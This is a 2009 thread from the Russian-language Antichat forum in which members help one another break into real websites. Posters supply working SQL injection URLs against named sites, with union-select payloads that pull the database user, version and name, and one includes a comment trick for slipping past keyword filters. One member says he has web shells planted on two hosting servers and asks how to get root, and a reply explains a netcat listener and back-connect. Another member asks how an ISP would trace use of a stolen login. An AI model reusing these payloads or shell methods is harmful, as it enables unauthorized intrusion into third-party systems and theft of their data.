ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
13.03.2009, 01:28
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
возможно какая то фильтрация :
PHP код:
http://flb.ru/?path=81&message_id=123+union%0Aselect+1,2,3,4,concat_ws(0x3A,user(),version(),database()),6,7,8--+
|
|
|
13.03.2009, 03:59
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
Провел на форуме:
115825
Репутация:
0
|
|
собственна давно интересует ламерский вопрос .
есть два ресурса( хостинга ) на обоих у меня залиты шеллы
1.
Software: Apache/2.0.59 (Unix). PHP/4.4.7
uname -a: FreeBSD ----------------- 6.2-RELEASE-p7 FreeBSD 6.2-RELEASE-p7 #0: Sat Aug 4 16:06:27
CEST 2007 root@--------.com:/usr/obj/usr/src/sys/1850 i386
uid=80(www) gid=80(www) groups=80(www)
Safe-mode: OFF (not secure)
2.
Software: Apache. PHP/5.2.6-1 uname -a: Linux 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure)
вот собственна ...
А теперь вопрос - как пользоваться NetCat если у меня не выделенный айпи
Есть хостинг покупной,Смотрел видео как коннектятся через Putty на домен ,ожидают бек коннекта ,биндят в шелле порт и подключаются и как там работает неткат . Попробовал на своем хосте на firstvds.ru - не работает . Нигде фака по инсталлу на сервер нетката не нашел поиск не рулит.
И второй вопрос - какой софт под эти оси нужен?
В обоих сервисах есть права на запись .
Нужен root.
Спасибо. |
|
|
|
13.03.2009, 05:57
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
А теперь вопрос - как пользоваться NetCat если у меня не выделенный айпи
бери ссх(можно попросить у знакомых, если нету), и там неткат на прослушку порта( nc -l -p порт ) и бекконекти (я через шелл от рст это делаю)
#4. Установка.. мде.. тут нужен рут :]
А вот если на ссх нетката нету, то не обязательно устанавливать, можно скомпилить и запускать потом ./netcat -l -p порт
Последний раз редактировалось Iceangel_; 13.03.2009 в 05:59..
|
|
|
|
13.03.2009, 11:32
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
http://www.theglobalreport.org/print.php?news_id=100'
Блин опять запариваюсь на скуле
Помогите с подбором
|
|
|
|
13.03.2009, 11:41
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Сообщение от diznt
http://www.theglobalreport.org/print.php?news_id=100'
Блин опять запариваюсь на скуле
Помогите с подбором
http://www.theglobalreport.org/print.php?news_id=-100'+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22+--+
|
|
|
|
13.03.2009, 11:42
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
http://www.theglobalreport.org/print.php?news_id=-100'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+--+
|
|
|
|
13.03.2009, 11:49
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Ок спасибо
http://www.skai.gr/master_story.php?id=113998%27
Тут возможна иньекция?
Когда подставляю id=-1+union+select+1,2--
То пишет не найдено
|
|
|
|
13.03.2009, 12:00
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
ветка 4
http://www.skai.gr/master_story.php?id=113998+and+substring(version() ,1,1)=4
Фильтрация union, select
http://www.skai.gr/master_story.php?id=113998+and+substring(version() ,1,1)=4/*select*/
PS. diznt давай уже что-то читать начни, а не только писать, всё это в статьях изложено и трудностей вызывать не должно, ты ведь не первый день на форуме
|
|
|
|
13.03.2009, 12:46
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Вот еще такой вопрос (правда не по уязвимостям)
Если я к примеру сижу через чужой логин в инете
то как меня вычеслят? ну я имею ввиду что корбина узнает что мол кто то сидит с акка и как они меня будут искать? я понимаю что там у них мой адрес где я проживаю
но все таки интересует как они узнают что с этого адреса где я прожимаю сидели под чужим логином?
|
|
|
|
13.03.2009, 12:56
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
diznt, с корбиной не знаком, но разве у тебя нет локального адреса, под которым ты заходишь в инет?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
